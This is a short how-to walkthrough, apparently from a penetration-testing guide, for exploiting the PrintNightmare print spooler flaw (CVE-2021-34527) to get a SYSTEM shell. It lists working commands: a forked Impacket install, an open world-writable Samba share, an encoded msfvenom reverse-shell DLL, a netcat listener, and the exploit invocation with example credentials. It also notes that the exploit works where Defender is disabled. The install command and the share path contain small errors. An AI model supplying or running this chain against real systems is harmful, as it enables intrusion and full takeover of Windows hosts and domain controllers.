Printnightmare (CVE-2021-34527) is a remote code execution vulnerability that allows for escalation of privileges to SYSTEM on endpoints running the print spooler service, where you already have user credentials. As of 11/8/2021 Windows Defender blocks the exploit, however it is possible to exploit where Defender is disabled.

For the following exploit, you need a specific version of Impacket which can be obtained using the following:

git clone <https://github.com/cube0x0/impacket.git>

Change to the installed directory and create a Python3 virtual environment and activate it

virtualenv -p $(which python3) venv

source venv/bin/activate

This will create a virtual Python3 environment. Change to the Impacket directory and install Impacket in the environment using the following:

python3 ./setup.py setup.py

Next, need to modify /etc/samba/smb.conf file to include the following at the bottom:

[SMB]
comment = SAMBA
path = "/tmp
browseable = yes
writeable = yes
only guest = no
create mask = 0777
directory mask = 0777
public = yes
guest ok = yes

This creates a publicly accessible share in the /tmp directory where the malicious .dll file for the exploit will be placed. You can use any Windows-based payload, however for simplicity the following works fine:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip address> LPORT=443 -i 10 -e x64/zutto_dekiru -f dll > shell.dll

Start a Netcat listener on your attack machine

nc -nlvp 443

Finally, execute the following command from the virtual Python3 instance you created earlier, noting that username, password, and IP addresses will all be different (as will the payload name if you changed it from above)

python3 CVE-2021-1675.py mayorsec.local/s.chisholm:'FallOutBoy1!'@192.168.3.75 '\\\\192.168.3.38\\smb\\shell.dll'

Running this should result in a SYSTEM level shell returned in Netcat. As noted, this works on systems running the print spooler service, which could be a Windows 10/11 machine, Windows Server, or a domain controller.

References: